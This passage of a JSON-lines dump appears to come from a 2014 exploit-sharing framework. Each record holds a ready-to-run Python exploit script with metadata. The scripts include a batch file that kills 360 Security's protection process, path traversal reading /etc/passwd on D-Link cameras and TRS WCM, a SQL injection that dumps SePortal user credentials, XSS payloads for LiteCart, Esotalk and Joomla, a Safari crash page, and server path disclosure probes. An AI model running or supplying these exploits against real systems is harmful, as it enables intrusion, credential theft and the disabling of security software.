\u7ecf\u6d4b\u8bd5\uff0c\u5982\u679c360\u5b89\u5168\u536b\u58eb\uff08\u5176\u5b9e\u4e0d\u6b62360\u4e00\u5bb6\uff09\u5b89\u88c5\u5728\u975e\u7cfb\u7edf\u76d8(360\u81ea\u8eab\u9ed8\u8ba4\u5b89\u88c5\u5728\u975e\u7cfb\u7edf\u76d8\uff09\uff0c\r\n \u7136\u540e\u5bf9\u5176\u6240\u5728\u76d8\u7b26\u8fdb\u884cchkdsk /x \u64cd\u4f5c\uff0c\u5176\u4e3b\u9632\u8fdb\u7a0b360tray.exe\u4f1a\u81ea\u52a8\u5f3a\u884c\u9000\u51fa\uff0c\u4ece\u800c\u5b8c\u5168\u5931\u53bb\u4fdd\u62a4\u80fd\u529b\u3002\r\n\r\n ''',\r\n 'references': 
['http://wooyun.org/bugs/wooyun-2014-078641',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n verify_url = args['options']['target']\r\n payload = '''\r\n@echo off\r\n\r\nchkdsk /x e:\r\n\r\ntaskkill /F /IM 360tray.exe /T\r\n'''\r\n # write\r\n test_bat = open('./360-taskkill.bat', 'w')\r\n test_bat.write(payload)\r\n test_bat.close()\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = 'Generation ok, file: ./360-taskkill.bat'\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "Wooyun Author zhuixing:\r\n\u6d4b\u8bd5\u4f7f\u7528Windows XP SP3\uff0cVMware Workstation 10.0.3\u3002\r\n\u7ecf\u6d4b\u8bd5\uff0c\u5982\u679c360\u5b89\u5168\u536b\u58eb\uff08\u5176\u5b9e\u4e0d\u6b62360\u4e00\u5bb6\uff09\u5b89\u88c5\u5728\u975e\u7cfb\u7edf\u76d8(360\u81ea\u8eab\u9ed8\u8ba4\u5b89\u88c5\u5728\u975e\u7cfb\u7edf\u76d8\uff09\uff0c\r\n\u7136\u540e\u5bf9\u5176\u6240\u5728\u76d8\u7b26\u8fdb\u884cchkdsk /x \u64cd\u4f5c\uff0c\u5176\u4e3b\u9632\u8fdb\u7a0b360tray.exe\u4f1a\u81ea\u52a8\u5f3a\u884c\u9000\u51fa\uff0c\u4ece\u800c\u5b8c\u5168\u5931\u53bb\u4fdd\u62a4\u80fd\u529b\u3002", "app_name": "360", "id": "poc-2014-0152", "layer4_protocol": null}
{"create_date": "2014-11-19 11:14:22", "name": "D-Link DCS-2103 /cgi-bin/sddownload.cgi \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e Exploit", "level": "\u4e2d\u5371", "batchable": 1, "author": "foundu", "rank": 4, "port": null, "vul_type": "\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d", "tag": "D-Link\u6f0f\u6d1e,\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e,/cgi-bin/sddownload.cgi,cgi", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0149',\r\n 'name': 'D-Link DCS-2103 /cgi-bin/sddownload.cgi \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e Exploit',\r\n 'author': 'foundu',\r\n 'create_date': '2014-11-19',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'D-Link',\r\n 'vul_version': 'DCS-2103',\r\n 'type': 'Arbitrary File Download',\r\n 'tag': ['D-Link\u6f0f\u6d1e', '\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e', '/cgi-bin/sddownload.cgi', 'cgi'],\r\n 'desc': '''\r\n Vulnerable is the next model: D-Link DCS-2103, Firmware 1.0.0. This model \r\n with other firmware versions also must be vulnerable.\r\n\r\n I found these vulnerabilities at 11.07.2014 and later informed D-Link. But \r\n they haven't answered. 
It looks like they are busy with fixing \r\n vulnerabilities in DAP-1360, which I wrote about earlier.\r\n ''',\r\n 'references': ['http://www.intelligentexploit.com/view-details.html?id=20197',\r\n ]\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def exploit(cls, args):\r\n payload = '/cgi-bin/sddownload.cgi?file=/../../etc/passwd'\r\n verify_url = args['options']['target'] + payload\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n if 'root:' in content and 'nobody:' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n args['poc_ret']['passwd'] = content\r\n return args\r\n\r\n\r\n verify = exploit\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "Vulnerable is the next model: D-Link DCS-2103, Firmware 1.0.0. This model with other firmware versions also must be vulnerable.\r\nI found these vulnerabilities at 11.07.2014 and later informed D-Link. But they haven't answered. It looks like they are busy with fixing vulnerabilities in DAP-1360, which I wrote about earlier.", "app_name": "D-LINK", "id": "poc-2014-0149", "layer4_protocol": null}
{"create_date": "2014-11-18 10:26:00", "name": "Safari 8.0 / OS X 10.10 - Crash POC", "level": "\u4f4e\u5371", "batchable": 0, "author": "\u96f7\u8702", "rank": 2, "port": null, "vul_type": "\u5176\u4ed6\u7c7b\u578b", "tag": "Safari\u6f0f\u6d1e,Crash PoC", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0146',\r\n 'name': 'Safari 8.0 / OS X 10.10 - Crash POC',\r\n 'author': '\u96f7\u8702',\r\n 'create_date': '2014-11-18',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [10000],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Safari',\r\n 'vul_version': ['8.0'],\r\n 'type': 'Other',\r\n 'tag': ['Safari\u6f0f\u6d1e', 'Crash PoC'],\r\n 'desc': 'N/A',\r\n 'references': ['http://1337day.com/exploit/22884',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n verify_url = args['options']['target']\r\n if args['options']['verbose']:\r\n print '[*] Generation'\r\n temp = '''\r\n <!DOCTYPE html>\r\n <head>\r\n <style>\r\n svg {\r\n padding-top: 1337%;\r\n box-sizing: border-box;\r\n }\r\n </style>\r\n </head>\r\n <body>\r\n <svg viewBox=\"0 0 500 500\" width=\"500\" height=\"500\">\r\n <polyline points=\"1 1,2 2\"></polyline>\r\n </svg>\r\n </body>\r\n </html>\r\n '''\r\n print '[*] Copy code: ' + temp\r\n args['poc_ret']['vul_url'] = 'Generation ok'\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "N/A --- Crash Crash Crash", "app_name": "Safari", "id": "poc-2014-0146", "layer4_protocol": null}
{"create_date": "2014-11-08 18:34:55", "name": "SePortal 2.4 /poll.php SQL\u6ce8\u5165\u6f0f\u6d1e POC & Exploit", "level": "\u4e2d\u5371", "batchable": 1, "author": "\u5c0f\u9a6c\u7532", "rank": 4, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "SePortal\u6f0f\u6d1e,SQL\u6ce8\u5165\u6f0f\u6d1e,/poll.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0141',\r\n 'name': 'SePortal 2.4 /poll.php SQL\u6ce8\u5165\u6f0f\u6d1e POC & Exploit',\r\n 'author': '\u5c0f\u9a6c\u7532',\r\n 'create_date': '2014-11-08',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'SePortal',\r\n 'vul_version': ['2.4'],\r\n 'type': 'SQL Injection',\r\n 'tag': ['SePortal\u6f0f\u6d1e', 'SQL\u6ce8\u5165\u6f0f\u6d1e', '/poll.php', 'php'],\r\n 'desc': 'N/A',\r\n 'references': ['http://sebug.net/vuldb/ssvid-8867',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = ('1\\'%20union%20select%201,convert(concat_ws(0x3a3a,0x3A3A33763537,user_name,user_password,'\r\n '0x616536393A3A)+using+latin1),1,1,1,1,1,1,1,1%20from%20seportal_users%20limit%201,1--%20z')\r\n verify_url = args['options']['target'] + '/poll.php?poll_id=' + payload\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n u_p = re.findall('::3v57::(.*?)::(.*?)::ae69::', content)\r\n if u_p:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return 
args\r\n\r\n @classmethod\r\n def exploit(cls, args):\r\n payload = ('1\\'%20union%20select%201,convert(concat_ws(0x3a3a,0x3A3A33763537,user_name,user_password,'\r\n '0x616536393A3A)+using+latin1),1,1,1,1,1,1,1,1%20from%20seportal_users%20limit%201,1--%20z')\r\n verify_url = args['options']['target'] + '/poll.php?poll_id=' + payload\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n u_p = re.findall('::3v57::(.*?)::(.*?)::ae69::', content)\r\n if u_p:\r\n (username,password) = u_p[0]\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n args['poc_ret']['DBInfo'] = {}\r\n args['poc_ret']['DBInfo']['Username'] = username\r\n args['poc_ret']['DBInfo']['Password'] = password\r\n return args\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "N/A", "app_name": "Other", "id": "poc-2014-0141", "layer4_protocol": null}
{"create_date": "2014-11-07 13:07:10", "name": "LiteCart 1.1.2.1 /search.php \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "foundu", "rank": 2, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "LiteCart\u6f0f\u6d1e,XSS\u6f0f\u6d1e,/search.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0139',\r\n 'name': 'LiteCart 1.1.2.1 /search.php \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC',\r\n 'author': 'foundu',\r\n 'create_date': '2014-11-07',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'LiteCart',\r\n 'vul_version': ['1.1.2.1'],\r\n 'type': 'Cross Site Scripting',\r\n 'tag': ['LiteCart\u6f0f\u6d1e', 'XSS\u6f0f\u6d1e', '/search.php', 'php'],\r\n 'desc': '''\r\n Several cross-site scripting vulnerabilities where discovered in LiteCart,\r\n an open source project that allows you to create a e-commerce sites.\r\n ''',\r\n 'references': ['https://www.netsparker.com/xss-vulnerabilities-in-litecart/',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = '''/search.php?query='\"--></style></scRipt><scRipt>alert(0x0000C0)</scRipt>'''\r\n verify_url = args['options']['target'] + payload\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n if '<scRipt>alert(0x0000C0)</scRipt>' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return 
args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "Several cross-site scripting vulnerabilities where discovered in LiteCart, an open source project that allows you to create a e-commerce sites.", "app_name": "LiteCart", "id": "poc-2014-0139", "layer4_protocol": null}
{"create_date": "2014-11-05 15:23:45", "name": "Esotalk topic xss vulnerability POC", "level": "\u4e2d\u5371", "batchable": 0, "author": "Evi1m0", "rank": 3, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "esotalk\u6f0f\u6d1e,xss,topic xss vul,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0137',\r\n 'name': 'Esotalk topic xss vulnerability POC',\r\n 'author': 'evi1m0',\r\n 'create_date': '2014-11-05',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'esotalk',\r\n 'vul_version': ['1.0'],\r\n 'type': 'Cross Site Request Forgery',\r\n 'tag': ['esotalk\u6f0f\u6d1e', 'xss', 'topic xss vul', 'php'],\r\n 'desc': 'esotalk topic xss vul.',\r\n 'references': ['http://www.hackersoul.com/post/ff0000-hsdb-0006.html',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n verify_url = args['options']['target']\r\n temp = '''\r\n [url=[img]onmouseover=alert(document.cookie);//://example.com/image.jpg#\"aaaaaa[/img]]evi1m0[/url]\r\n '''\r\n print '[*] Copy code: ' + temp\r\n print '[*] Specific use: ' + str(MyPoc.poc_info['vul']['references'])\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = 'Generation ok'\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "esotalk topic xss vul.", "app_name": "esotalk", "id": "poc-2014-0137", "layer4_protocol": null}
{"create_date": "2014-11-01 17:25:13", "name": "Cmstop 1.0 /apps/system/view/template/edit.php Path Disclosure POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "foundu", "rank": 2, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "cmstop\u4fe1\u606f\u6cc4\u9732,cmstop\u7206\u8def\u5f84,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0135',\r\n 'name': 'Cmstop 1.0 /apps/system/view/template/edit.php Path Disclosure POC',\r\n 'author': 'foundu',\r\n 'create_date': '2014-11-01',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'cmstop',\r\n 'vul_version': ['1.0'],\r\n 'type': 'Information Disclosure',\r\n 'tag': ['cmstop\u4fe1\u606f\u6cc4\u9732', 'cmstop\u7206\u8def\u5f84', 'php'],\r\n 'desc': 'N/A',\r\n 'references': ['https://www.yascanner.com/#!/n/56',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n file_list = ['/cmstop/apps/system/view/template/edit.php',\r\n '/apps/system/view/template/edit.php',]\r\n args['poc_ret']['file_path'] = []\r\n for filename in file_list:\r\n verify_url = args['options']['target'] + filename\r\n try:\r\n if args['options']['verbose']:\r\n print '[*] Requst URL: ' + verify_url\r\n req = urllib2.urlopen(verify_url)\r\n content = req.read()\r\n except:\r\n continue\r\n m = re.search(' in <b>([^<]+)</b> on line <b>(\\d+)</b>', content)\r\n if m:\r\n args['success'] = True\r\n args['poc_ret']['file_path'].append(verify_url)\r\n if not args['poc_ret']['file_path']:\r\n 
args['poc_ret'].pop('file_path')\r\n args['success'] = False\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "N/A", "app_name": "CMSTOP", "id": "poc-2014-0135", "layer4_protocol": null}
{"create_date": "2014-11-01 17:18:56", "name": "Wordpress full Path Disclosure Vulnerability POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "foundu", "rank": 3, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "Wordpress\u4fe1\u606f\u6cc4\u9732,Wordpress\u7206\u8def\u5f84,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0134',\r\n 'name': 'Wordpress full Path Disclosure Vulnerability POC',\r\n 'author': 'foundu',\r\n 'create_date': '2014-11-01',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Wordpress',\r\n 'vul_version': ['*'],\r\n 'type': 'Information Disclosure',\r\n 'tag': ['Wordpress\u4fe1\u606f\u6cc4\u9732', 'Wordpress\u7206\u8def\u5f84', 'php'],\r\n 'desc': 'N/A',\r\n 'references': ['https://www.yascanner.com/#!/n/53',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n file_list = ['/wp-includes/registration-functions.php',\r\n '/wp-includes/registration.php',\r\n '/wp-includes/user.php',\r\n '/wp-includes/rss-functions.php',]\r\n args['poc_ret']['file_path'] = []\r\n for filename in file_list:\r\n verify_url = args['options']['target'] + filename\r\n try:\r\n if args['options']['verbose']:\r\n print '[*] Requst URL: ' + verify_url\r\n req = urllib2.urlopen(verify_url)\r\n content = req.read()\r\n except:\r\n continue\r\n m = re.search('</b>:[^\\r\\n]+ in <b>([^<]+)</b> on line <b>(\\d+)</b>', content)\r\n if m:\r\n args['success'] = True\r\n args['poc_ret']['file_path'].append(verify_url)\r\n 
if not args['poc_ret']['file_path']:\r\n args['poc_ret'].pop('file_path')\r\n args['success'] = False\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "\u6548\u679c\u8fd8\u4e0d\u9519", "app_name": "WordPress", "id": "poc-2014-0134", "layer4_protocol": null}
{"create_date": "2014-10-31 11:01:33", "name": "TRS wcm\u7cfb\u7edf /wcm/app/system/read_image.jsp \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "wangjianyu", "rank": 3, "port": null, "vul_type": "\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d", "tag": "TRS wcm\u6f0f\u6d1e,\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e,/wcm/app/system/read_image.jsp,jsp", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0131',\r\n 'name': 'TRS wcm\u7cfb\u7edf /wcm/app/system/read_image.jsp \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e POC',\r\n 'author': 'wangjianyu',\r\n 'create_date': '2014-10-31',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'TRS WCM',\r\n 'vul_version': '*',\r\n 'type': 'Arbitrary File Download',\r\n 'tag': ['TRS wcm\u6f0f\u6d1e', '\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e', '/wcm/app/system/read_image.jsp', 'jsp'],\r\n 'desc': 'N/A',\r\n 'references': ['http://www.wooyun.org/bugs/wooyun-2014-061225',\r\n ]\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = '/wcm/app/system/read_image.jsp?filename=../../../../../../../../../../../../../../../../../etc/passwd'\r\n verify_url = args['options']['target'] + payload\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n if \"root:\" in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n 
return args\r\n\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "N/A", "app_name": "TRS", "id": "poc-2014-0131", "layer4_protocol": null}
{"create_date": "2014-10-30 16:03:18", "name": "Shopex /svinfo.php phpinfo\u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "user1018", "rank": 2, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "Shopex\u4fe1\u606f\u6cc4\u9732,phpinfo\u6cc4\u9732,php,svinfo.php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0129',\r\n 'name': 'Shopex /svinfo.php phpinfo\u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e POC',\r\n 'author': 'user1018',\r\n 'create_date': '2014-10-30',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Shopex',\r\n 'vul_version': ['*'],\r\n 'type': 'Information Disclosure',\r\n 'tag': ['Shopex\u4fe1\u606f\u6cc4\u9732', 'phpinfo\u6cc4\u9732', 'php', 'svinfo.php'],\r\n 'desc': '''\r\n http://sitename/app/dev/svinfo.php?phpinfo=true\r\n http://sitename/app/dev/svinfo.php?download=true\r\n http://sitename/install/svinfo.php?phpinfo=true\r\n ''',\r\n 'references': ['N/A',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n file_list = ['/app/dev/svinfo.php?phpinfo=true',\r\n '/install/svinfo.php?phpinfo=true',\r\n '/app/dev/svinfo.php?download=true']\r\n args['poc_ret']['file_path'] = []\r\n for filename in file_list:\r\n verify_url = args['options']['target'] + filename\r\n try:\r\n if args['options']['verbose']:\r\n print '[*] Requst URL: ' + verify_url\r\n req = urllib2.urlopen(verify_url)\r\n content = req.read()\r\n except:\r\n continue\r\n if 'ShopEx' in content and 'MySQL' in 
content:\r\n args['success'] = True\r\n args['poc_ret']['file_path'].append(verify_url)\r\n if not args['poc_ret']['file_path']:\r\n args['poc_ret'].pop('file_path')\r\n args['success'] = False\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "http://sitename/app/dev/svinfo.php?phpinfo=true\r\nhttp://sitename/app/dev/svinfo.php?download=true\r\nhttp://sitename/install/svinfo.php?phpinfo=true", "app_name": "ShopEx", "id": "poc-2014-0129", "layer4_protocol": null}
{"create_date": "2014-10-29 13:31:40", "name": "Joomla BeaconDecode \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "tmp", "rank": 2, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "Joomla\u6f0f\u6d1e,XSS\u6f0f\u6d1e,BeaconDecode,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0126',\r\n 'name': 'Joomla BeaconDecode \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC',\r\n 'author': 'tmp',\r\n 'create_date': '2014-10-29',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Joomla',\r\n 'vul_version': ['*'],\r\n 'type': 'Cross Site Scripting',\r\n 'tag': ['Joomla\u6f0f\u6d1e', 'XSS\u6f0f\u6d1e', 'BeaconDecode', 'php'],\r\n 'desc': 'Vulnerable File: index.php?option=com_beacondecode&task=',\r\n 'references': ['https://www.yascanner.com/#!/x/19498',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = '/index.php?option=com_beacondecode&task=\"/><script>alert(233)</script>'\r\n verify_url = args['options']['target'] + payload\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n if '\"/><script>alert(233)</script>' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import 